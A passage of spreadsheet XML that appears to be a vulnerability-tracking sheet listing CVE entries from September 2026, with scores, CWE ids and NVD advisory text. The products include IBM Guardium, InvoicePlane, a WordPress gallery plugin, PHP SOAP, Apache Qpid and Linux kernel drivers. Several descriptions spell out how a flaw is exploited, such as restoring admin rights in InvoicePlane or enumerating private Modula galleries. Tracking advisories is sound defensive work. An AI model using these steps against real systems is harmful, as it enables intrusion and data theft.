      <c r="B144" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C144" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84882</t>
        </is>
      </c>
      <c r="D144" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E144" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F144" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G144" s="5" t="inlineStr"/>
      <c r="H144" s="5" t="inlineStr"/>
      <c r="I144" s="5" t="inlineStr"/>
      <c r="J144" s="5" t="inlineStr">
        <is>
          <t>oracle</t>
        </is>
      </c>
      <c r="K144" s="5" t="inlineStr"/>
      <c r="L144" s="5" t="inlineStr"/>
      <c r="M144" s="5" t="inlineStr"/>
      <c r="N144" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O144" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P144" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q144" s="5" t="inlineStr"/>
      <c r="R144" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S144" s="5" t="inlineStr">
        <is>
          <t>IBM Guardium Data Protection 12.2 is vulnerable to path traversal in the Universal Connector Oracle Wallet upload component. An authenticated remote attacker could exploit this vulnerability to write arbitrary files to the system.</t>
        </is>
      </c>
      <c r="T144" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84882</t>
        </is>
      </c>
    </row>
    <row r="145">
      <c r="A145" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B145" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C145" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84884</t>
        </is>
      </c>
      <c r="D145" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E145" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F145" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G145" s="5" t="inlineStr"/>
      <c r="H145" s="5" t="inlineStr"/>
      <c r="I145" s="5" t="inlineStr"/>
      <c r="J145" s="5" t="inlineStr"/>
      <c r="K145" s="5" t="inlineStr"/>
      <c r="L145" s="5" t="inlineStr"/>
      <c r="M145" s="5" t="inlineStr"/>
      <c r="N145" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O145" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P145" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q145" s="5" t="inlineStr"/>
      <c r="R145" s="5" t="inlineStr">
        <is>
          <t>CWE-256</t>
        </is>
      </c>
      <c r="S145" s="5" t="inlineStr">
        <is>
          <t>IBM Guardium Data Protection 12.2 stores internal REST service-account passwords in a reversible plaintext-equivalent format. An authenticated attacker who gains access to the stored credential could recover the password and obtain an administrative REST access token.</t>
        </is>
      </c>
      <c r="T145" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84884</t>
        </is>
      </c>
    </row>
    <row r="146">
      <c r="A146" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B146" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C146" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85029</t>
        </is>
      </c>
      <c r="D146" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E146" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F146" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G146" s="5" t="inlineStr"/>
      <c r="H146" s="5" t="inlineStr"/>
      <c r="I146" s="5" t="inlineStr"/>
      <c r="J146" s="5" t="inlineStr"/>
      <c r="K146" s="5" t="inlineStr"/>
      <c r="L146" s="5" t="inlineStr"/>
      <c r="M146" s="5" t="inlineStr"/>
      <c r="N146" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O146" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P146" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q146" s="5" t="inlineStr"/>
      <c r="R146" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S146" s="5" t="inlineStr">
        <is>
          <t>IBM Guardium Data Protection 12.2 could allow a remote attacker to obtain sensitive information, delete arbitrary files, or execute arbitrary code due to improper limitation of a pathname to a restricted directory.</t>
        </is>
      </c>
      <c r="T146" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85029</t>
        </is>
      </c>
    </row>
    <row r="147">
      <c r="A147" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B147" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C147" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88003</t>
        </is>
      </c>
      <c r="D147" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E147" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F147" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G147" s="5" t="inlineStr"/>
      <c r="H147" s="5" t="inlineStr"/>
      <c r="I147" s="5" t="inlineStr"/>
      <c r="J147" s="5" t="inlineStr">
        <is>
          <t>requests, gin, rust</t>
        </is>
      </c>
      <c r="K147" s="5" t="inlineStr"/>
      <c r="L147" s="5" t="inlineStr"/>
      <c r="M147" s="5" t="inlineStr"/>
      <c r="N147" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O147" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P147" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q147" s="5" t="inlineStr"/>
      <c r="R147" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S147" s="5" t="inlineStr">
        <is>
          <t>InvoicePlane is a self-hosted open source application for managing invoices, clients, and payments. Prior to 1.7.2, InvoicePlane fails to revoke administrative privileges after a role downgrade because Admin_Controller trusts the user_type snapshot stored in an existing session instead of revalidating ip_users.user_type. When one administrator downgrades another account, the target's active session continues to authorize administrative requests. The downgraded user can use Users::form() to set user_type back to 1, restoring the database role and making the privilege escalation persistent. This vulnerability is fixed in 1.7.2.</t>
        </is>
      </c>
      <c r="T147" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88003</t>
        </is>
      </c>
    </row>
    <row r="148">
      <c r="A148" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B148" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C148" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88421</t>
        </is>
      </c>
      <c r="D148" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E148" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F148" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G148" s="5" t="inlineStr"/>
      <c r="H148" s="5" t="inlineStr"/>
      <c r="I148" s="5" t="inlineStr"/>
      <c r="J148" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K148" s="5" t="inlineStr"/>
      <c r="L148" s="5" t="inlineStr"/>
      <c r="M148" s="5" t="inlineStr"/>
      <c r="N148" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O148" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P148" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q148" s="5" t="inlineStr"/>
      <c r="R148" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="S148" s="5" t="inlineStr">
        <is>
          <t>Incorrect access control in the BlogPage.get_entries() component of APSL puput v1.2.1 through v2.2.0 allows unauthenticated attackers to view restricted blog entries via the blog index, the tag, category, author and date archives, the sidebar widgets, or the RSS feed.</t>
        </is>
      </c>
      <c r="T148" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88421</t>
        </is>
      </c>
    </row>
    <row r="149">
      <c r="A149" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B149" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C149" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89406</t>
        </is>
      </c>
      <c r="D149" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E149" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F149" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G149" s="5" t="inlineStr"/>
      <c r="H149" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I149" s="5" t="inlineStr"/>
      <c r="J149" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K149" s="5" t="inlineStr"/>
      <c r="L149" s="5" t="inlineStr"/>
      <c r="M149" s="5" t="inlineStr"/>
      <c r="N149" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O149" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P149" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q149" s="5" t="inlineStr"/>
      <c r="R149" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S149" s="5" t="inlineStr">
        <is>
          <t>The Modula Image Gallery – Photo Grid &amp; Video Gallery plugin for WordPress is vulnerable to unauthorized disclosure of private gallery contents in versions up to, and including, 3.0.1. This is due to the Modula_Meta::add_metas() function being hooked to wp_head on every frontend request and looking up any post via get_post( $_GET['modula_gallery_id'] ) without verifying the gallery's post_status or the requester's capability to read it — the gallery-side input guard is bugged (empty('modula_gallery_id') tests a nonempty string literal instead of the GET parameter, so it is always false), the only object validation is a post_type === 'modula-gallery' check, and no is_user_logged_in()/current_user_can('read_post', $gallery_id) check is performed. This makes it possible for unauthenticated attackers to enumerate private modula-gallery posts and their member attachments and recover the image's title, description, dimensions, and original upload URL via Open Graph/Twitter meta tags emitted in the response, which then allows direct unauthenticated download of the original private image bytes.</t>
        </is>
      </c>
      <c r="T149" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89406</t>
        </is>
      </c>
    </row>
    <row r="150">
      <c r="A150" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B150" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C150" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91765</t>
        </is>
      </c>
      <c r="D150" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E150" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F150" s="5" t="inlineStr">
        <is>
          <t>security@php.net</t>
        </is>
      </c>
      <c r="G150" s="5" t="inlineStr"/>
      <c r="H150" s="5" t="inlineStr"/>
      <c r="I150" s="5" t="inlineStr"/>
      <c r="J150" s="5" t="inlineStr"/>
      <c r="K150" s="5" t="inlineStr"/>
      <c r="L150" s="5" t="inlineStr"/>
      <c r="M150" s="5" t="inlineStr"/>
      <c r="N150" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O150" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P150" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q150" s="5" t="inlineStr"/>
      <c r="R150" s="5" t="inlineStr">
        <is>
          <t>CWE-674</t>
        </is>
      </c>
      <c r="S150" s="5" t="inlineStr">
        <is>
          <t>cleanup_xml_node() in the SOAP XML parser recurses once per XML nesting level with no depth limit. An unauthenticated attacker can post a SOAP request containing tens of thousands of nested elements to any SoapServer endpoint, exhaust the stack and crash the process. The same unbounded recursion exists in the SOAP value decoder and in the WSDL node search helper.</t>
        </is>
      </c>
      <c r="T150" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91765</t>
        </is>
      </c>
    </row>
    <row r="151">
      <c r="A151" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B151" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C151" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92550</t>
        </is>
      </c>
      <c r="D151" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E151" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F151" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G151" s="5" t="inlineStr"/>
      <c r="H151" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I151" s="5" t="inlineStr"/>
      <c r="J151" s="5" t="inlineStr"/>
      <c r="K151" s="5" t="inlineStr"/>
      <c r="L151" s="5" t="inlineStr"/>
      <c r="M151" s="5" t="inlineStr"/>
      <c r="N151" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O151" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P151" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q151" s="5" t="inlineStr"/>
      <c r="R151" s="5" t="inlineStr">
        <is>
          <t>CWE-789</t>
        </is>
      </c>
      <c r="S151" s="5" t="inlineStr">
        <is>
          <t>A pre-authentication attacker could leverage type size/count handling to cause excessive allocation leading to potential denial of service.
This issue affects Apache Qpid Broker-J: through 10.1.0.
Users are recommended to upgrade to version 10.1.1, which fixes the issue.</t>
        </is>
      </c>
      <c r="T151" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92550</t>
        </is>
      </c>
    </row>
    <row r="152">
      <c r="A152" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B152" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C152" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92560</t>
        </is>
      </c>
      <c r="D152" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E152" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F152" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G152" s="5" t="inlineStr"/>
      <c r="H152" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I152" s="5" t="inlineStr"/>
      <c r="J152" s="5" t="inlineStr"/>
      <c r="K152" s="5" t="inlineStr"/>
      <c r="L152" s="5" t="inlineStr"/>
      <c r="M152" s="5" t="inlineStr"/>
      <c r="N152" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O152" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P152" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q152" s="5" t="inlineStr"/>
      <c r="R152" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S152" s="5" t="inlineStr">
        <is>
          <t>A pre-authentication attacker could leverage type size/count handling to cause excessive allocation leading to potential denial of service.
This issue affects Apache Qpid Broker-J: through 10.1.0.
Users are recommended to upgrade to version 10.1.1, which fixes the issue.</t>
        </is>
      </c>
      <c r="T152" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92560</t>
        </is>
      </c>
    </row>
    <row r="153">
      <c r="A153" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B153" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C153" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92608</t>
        </is>
      </c>
      <c r="D153" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E153" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F153" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G153" s="5" t="inlineStr"/>
      <c r="H153" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I153" s="5" t="inlineStr"/>
      <c r="J153" s="5" t="inlineStr"/>
      <c r="K153" s="5" t="inlineStr"/>
      <c r="L153" s="5" t="inlineStr"/>
      <c r="M153" s="5" t="inlineStr"/>
      <c r="N153" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O153" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P153" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q153" s="5" t="inlineStr"/>
      <c r="R153" s="5" t="inlineStr">
        <is>
          <t>CWE-248</t>
        </is>
      </c>
      <c r="S153" s="5" t="inlineStr">
        <is>
          <t>Improper handling of property-encoding exceptions in AMQP 1.0-to-AMQP 0-10 message conversion allows authenticated message producers to disrupt delivery to AMQP 0-10 consumers via message properties that the target encoder does not handle correctly.
This issue affects Apache Qpid Broker-J: through 10.1.0.
Users are recommended to upgrade to version 10.1.1, which fixes the issue.</t>
        </is>
      </c>
      <c r="T153" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92608</t>
        </is>
      </c>
    </row>
    <row r="154">
      <c r="A154" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B154" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C154" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97523</t>
        </is>
      </c>
      <c r="D154" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E154" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F154" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G154" s="5" t="inlineStr"/>
      <c r="H154" s="5" t="inlineStr"/>
      <c r="I154" s="5" t="inlineStr"/>
      <c r="J154" s="5" t="inlineStr"/>
      <c r="K154" s="5" t="inlineStr"/>
      <c r="L154" s="5" t="inlineStr"/>
      <c r="M154" s="5" t="inlineStr"/>
      <c r="N154" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O154" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P154" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q154" s="5" t="inlineStr"/>
      <c r="R154" s="5" t="inlineStr"/>
      <c r="S154" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
mptcp: close race between scheduler and state change
The mptcp scheduler may race with subflow sockets state change: data
transmission on the selected socket may fail and a later release could
try to use mss_now reset to 0 for a divide operation.
Address the issue by explicitly checking for the critical scenario.</t>
        </is>
      </c>
      <c r="T154" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97523</t>
        </is>
      </c>
    </row>
    <row r="155">
      <c r="A155" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B155" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C155" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97524</t>
        </is>
      </c>
      <c r="D155" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E155" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F155" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G155" s="5" t="inlineStr"/>
      <c r="H155" s="5" t="inlineStr"/>
      <c r="I155" s="5" t="inlineStr"/>
      <c r="J155" s="5" t="inlineStr"/>
      <c r="K155" s="5" t="inlineStr"/>
      <c r="L155" s="5" t="inlineStr"/>
      <c r="M155" s="5" t="inlineStr"/>
      <c r="N155" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O155" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P155" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q155" s="5" t="inlineStr"/>
      <c r="R155" s="5" t="inlineStr"/>
      <c r="S155" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
mptcp: avoid unneeded actions on subflow reset
Once in a blue moon, the mptcp receive path can recursively call
mptcp_data_ready() via state change under unlucky error conditions, and
then try to hold the data lock again.
Break the recursion loop explicitly checking for the exceptional
condition.
Add a new flag instead of using an existing one like 'closing', to exit
early in subflow_state_change(), and explicitly flush the RX queue at
reset time.
This avoids unneeded processing to check for available data -- calling
get_mapping_status() and more on a dying subflow -- but also in error
reporting and worker scheduling.
Note that we must consume the currently peeked skb before invoking
mptcp_dss_corruption to avoid consuming it again after the eventual
reset has freed it.</t>
        </is>
      </c>
      <c r="T155" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97524</t>
        </is>
      </c>
    </row>
    <row r="156">
      <c r="A156" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B156" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C156" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97531</t>
        </is>
      </c>
      <c r="D156" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E156" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F156" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G156" s="5" t="inlineStr"/>
      <c r="H156" s="5" t="inlineStr"/>
      <c r="I156" s="5" t="inlineStr"/>
      <c r="J156" s="5" t="inlineStr"/>
      <c r="K156" s="5" t="inlineStr"/>
      <c r="L156" s="5" t="inlineStr"/>
      <c r="M156" s="5" t="inlineStr"/>
      <c r="N156" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O156" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P156" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q156" s="5" t="inlineStr"/>
      <c r="R156" s="5" t="inlineStr"/>
      <c r="S156" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: qla2xxx: Skip vport under deletion in report ID acquisition
qla24xx_report_id_acquisition() format-1 handling walks ha-&gt;vp_list under
vport_slock, takes a vref_count on the matching vport and calls
qla_update_host_map() to register its port id.
A vport teardown via qla24xx_vport_delete() sets VPORT_DELETE, then
qla24xx_disable_vp() removes the vport from the host_map btree and zeroes
vha-&gt;d_id (RESET_AL_PA). The vport is only unlinked from vp_list later,
in qla24xx_deallocate_vp_id(), which clears vp_map[idx] (RESET_VP_IDX)
but does not touch host_map. In the window in between, report ID
acquisition can still find the vport on vp_list and call
qla_update_host_map(); with d_id already zeroed it takes the
btree_insert32() path and re-inserts the dying vport into host_map.
Nothing cleans that entry afterwards, so once scsi_host_put() frees the
vha a later host_map lookup dereferences freed memory.
Skip a vport that has VPORT_DELETE set before taking the reference, so it
is neither re-registered nor scheduled for DPC re-registration. This
mirrors the existing guard in qla2x00_alert_all_vps().</t>
        </is>
      </c>
      <c r="T156" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97531</t>
        </is>
      </c>
    </row>
    <row r="157">
      <c r="A157" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B157" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C157" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97536</t>
        </is>
      </c>
      <c r="D157" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E157" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F157" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G157" s="5" t="inlineStr"/>
      <c r="H157" s="5" t="inlineStr"/>
      <c r="I157" s="5" t="inlineStr"/>
      <c r="J157" s="5" t="inlineStr"/>
      <c r="K157" s="5" t="inlineStr"/>
      <c r="L157" s="5" t="inlineStr"/>
      <c r="M157" s="5" t="inlineStr"/>
      <c r="N157" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O157" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P157" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q157" s="5" t="inlineStr"/>
      <c r="R157" s="5" t="inlineStr"/>
      <c r="S157" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: qla2xxx: Fix use-after-free of qpair work on queue teardown
The response queue MSI-X handler qla2xxx_msix_rsp_q() schedules
qla_do_work() via queue_work(ha-&gt;wq, &amp;qpair-&gt;q_work). qla_do_work()
dereferences the qpair (vha, rsp) and takes qpair-&gt;qp_lock.
During teardown, qla2xxx_delete_qpair() deletes the response queue, which
calls free_irq() in qla25xx_free_rsp_que(), and then frees the queue and
the qpair. free_irq() waits for running hardirq handlers but does not
cancel work already placed on ha-&gt;wq. A still-pending q_work then runs
qla_do_work() against the freed qpair and response queue, causing a
use-after-free. This is especially likely during full adapter teardown,
where destroy_workqueue(ha-&gt;wq) forces pending work to run after the queue
pairs have been freed.
Flush the work item with cancel_work_sync() in qla25xx_free_rsp_que()
after free_irq() has released the interrupt (so no new work can be
queued) and before the response queue and qpair memory are freed (so the
flushed handler still sees valid memory). Guard on rsp-&gt;qpair and ha-&gt;wq
to match the INIT_WORK() condition and avoid operating on an
uninitialized work_struct.</t>
        </is>
      </c>
      <c r="T157" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97536</t>
        </is>
      </c>
    </row>
    <row r="158">
      <c r="A158" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B158" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C158" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97557</t>
        </is>
      </c>
      <c r="D158" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E158" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F158" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G158" s="5" t="inlineStr"/>
      <c r="H158" s="5" t="inlineStr"/>
      <c r="I158" s="5" t="inlineStr"/>
      <c r="J158" s="5" t="inlineStr"/>
      <c r="K158" s="5" t="inlineStr"/>
      <c r="L158" s="5" t="inlineStr"/>
      <c r="M158" s="5" t="inlineStr"/>
      <c r="N158" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O158" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P158" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q158" s="5" t="inlineStr"/>
      <c r="R158" s="5" t="inlineStr"/>
      <c r="S158" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smb: client: avoid leaking refcount in cifs_queue_oplock_break()
cifs_queue_oplock_break() unconditionally takes a reference on the
target file before queueing cifs_oplock_break(). Only that work item
decreases the reference counter again.
If another oplock break arrives while that work is still queued,
queue_work() will return false and not queue this second work item. As a
result, we will never reach the point to drop the file reference again
and are leaking this reference. This can be triggered when interacting
with a slow-responding server.
As a result, later unmount operations for this file system will fail with
  BUG: Dentry ... still in use (1) [unmount of cifs cifs]
  VFS: Busy inodes after unmount of cifs (cifs)
  kernel BUG at fs/super.c:777!
Fix this by only incrementing the reference count if the work has been
